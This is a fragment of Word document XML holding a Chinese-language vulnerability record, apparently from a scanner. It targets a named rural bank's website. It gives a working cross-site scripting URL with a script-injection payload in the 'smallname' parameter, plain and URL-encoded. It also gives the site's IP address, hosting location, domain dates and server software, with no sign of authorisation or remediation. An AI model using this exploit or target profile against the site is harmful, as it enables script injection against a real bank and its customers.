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注入网址:http://llgfcb.com/sershow.asp?smallname=&lt;/script&gt;"&gt;&lt;script&gt;prompt(1)&lt;/script&gt;%3C%2Fscript%3E%22%3E%3Cscript%3Eprompt%281%29%3C%2Fscript%3E</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t>漏洞参数:smallname</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t>请求方式:POST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0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t>网站主页  http://llgfcb.com</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t>网站描述  "国丰村镇银行"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t>网站标题  龙里国丰村镇银行</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t>IP__坐标  广东省深圳市 阿里云</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t>所属__IP  39.108.253.82</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t>网站年龄  8年4月10天（创建于2011年01月07日,过期时间为2021年01月07日)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t>备案编号  暂无信息</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t>备案性质  暂无信息</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t>备案名称  暂无信息</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t>备案时间  暂无信息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text/html;charset=UTF-8  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">服务类型   Tengine/Aserver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http://llgfcb.com/sershow.asp?smallname=&lt;/script&gt;"&gt;&lt;script&gt;prompt(1)&lt;/script&gt;%3C%2Fscript%3E%22%3E%3Cscript%3Eprompt%281%29%3C%2Fscript%3E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gfcb.c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